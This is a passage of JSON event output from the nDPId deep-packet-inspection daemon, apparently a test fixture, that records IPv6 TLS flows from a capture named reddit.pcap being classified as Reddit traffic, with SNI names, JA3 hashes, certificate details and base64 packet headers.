-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hEAAAAAoAL9ICE+AAACBAWgBAIICkv6YkkAAAAAAQMDBw=="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686996,"flow_last_seen":1605291686996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="} 